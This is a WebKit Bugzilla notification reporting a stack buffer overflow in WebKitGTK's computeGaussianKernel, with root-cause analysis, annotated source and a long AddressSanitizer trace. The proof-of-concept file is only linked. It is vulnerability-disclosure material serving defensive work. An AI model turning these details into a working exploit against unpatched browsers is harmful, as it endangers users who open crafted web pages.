[Webkit-unassigned] [Bug 265659] New: [GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
bugzilla-daemon at webkit.org
Fri Dec 1 05:29:27 PST 2023
https://bugs.webkit.org/show_bug.cgi?id=265659
Bug ID: 265659
Summary: [GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
Product: WebKit
Version: WebKit Local Build
Hardware: PC
OS: Linux
Status: NEW
Keywords: Gtk
Severity: Normal
Priority: P3
Component: DOM
Assignee: webkit-unassigned at lists.webkit.org
Reporter: pswpsw0177 at gmail.com
Created attachment 468832
--> https://bugs.webkit.org/attachment.cgi?id=468832&action=review
PoC file
1. Vulnerability Title
a. WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability
2. High-level overview of the vulnerability and the possible effect of using it
a. A stack buffer overflow exists in the WebKit GTK `computeGaussianKernel` function.
b. An attacker must open an arbitrarily generated HTML file to exploit this vulnerability.
3. Exact product that was found to be vulnerable including complete version information
a. Ubuntu 22.04.3 LTS
4. Root Cause Analysis (recommended but not required)
a. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel`.
b. Referencing `radius` in the function `computeGaussianKernel` causes a stack buffer overflow.
c. The lack of size validation for `radius` leads to a stack buffer overflow.
```cpp
// Excerpt from Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp
// (webkitgtk-2.41.92) as quoted in the report. The helpers gauss() and
// kernelHalfSizeToSimplifiedKernelHalfSize() and the two size constants are
// not reproduced here.
static unsigned blurRadiusToKernelHalfSize(float radius)
{
    // No upper bound on radius: kernelHalfSize grows linearly with it.
    return ceilf(radius * 2 + 1);
}

static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset)
{
    unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius);
    // Debug-only check: WTF's ASSERT compiles to nothing in release builds,
    // so an oversized kernelHalfSize reaches the loop below unchecked.
    ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize);
    float fullKernel[GaussianKernelMaxHalfSize]; // fixed-size stack array
    fullKernel[0] = 1;
    float sum = fullKernel[0];
    for (unsigned i = 1; i < kernelHalfSize; ++i) {
        fullKernel[i] = gauss(i, radius); //====> crash here: i runs past GaussianKernelMaxHalfSize
        sum += 2 * fullKernel[i];
    }
    float scale = 1 / sum;
    for (unsigned i = 0; i < kernelHalfSize; ++i)
        fullKernel[i] *= scale;
    unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize);
    kernel[0] = fullKernel[0];
    for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) {
        unsigned offset1 = 2 * i - 1;
        unsigned offset2 = 2 * i;
        if (offset2 >= kernelHalfSize) {
            kernel[i] = fullKernel[offset1];
            offset[i] = offset1;
            break;
        }
        kernel[i] = fullKernel[offset1] + fullKernel[offset2];
        offset[i] = (fullKernel[offset1] * offset1 + fullKernel[offset2] * offset2) / kernel[i];
    }
    return simplifiedKernelHalfSize;
}
```
```text
=================================================================
==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88
WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor)
#0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23
#1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36
#2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13
#3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16
#4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28
#5 0x7f4c093aef34 in WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40
#6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9
#7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17
#8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9
#9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#31 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16
#35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5
#36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9
#37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9
#38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5
#39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23
#40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14
#41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68
#42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
#43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
#44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5
#45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14
#46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
#47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11
#48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17
#49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
#50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35
#51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33
#52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16
#53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43
#54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
#55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
#56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
#57 0x7f4bfcb76257 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
#58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
#59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9
#60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9
#61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39
#62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
#63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5
#64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5
#65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8
#66 0x7f4bfc526a3f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame
#0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856
This frame has 6 object(s):
[32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable
[112, 120) 'program' (line 857)
[144, 168) 'kernel' (line 870)
[208, 232) 'offset' (line 871)
[272, 400) 'textureBlurMatrix' (line 877)
[432, 560) 'ref.tmp53' (line 895)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
Thread T9 (eadedCompositor) created by T0 here:
#0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984)
#1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17
#2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32
#3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5
#4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17
#5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
#6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
#7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28
#8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26
#9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20
#10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34
#11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12
#12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27
#13 0x7f4c0925afda in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5
#14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24
#15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31
#16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21
#17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13
#18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
#19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, 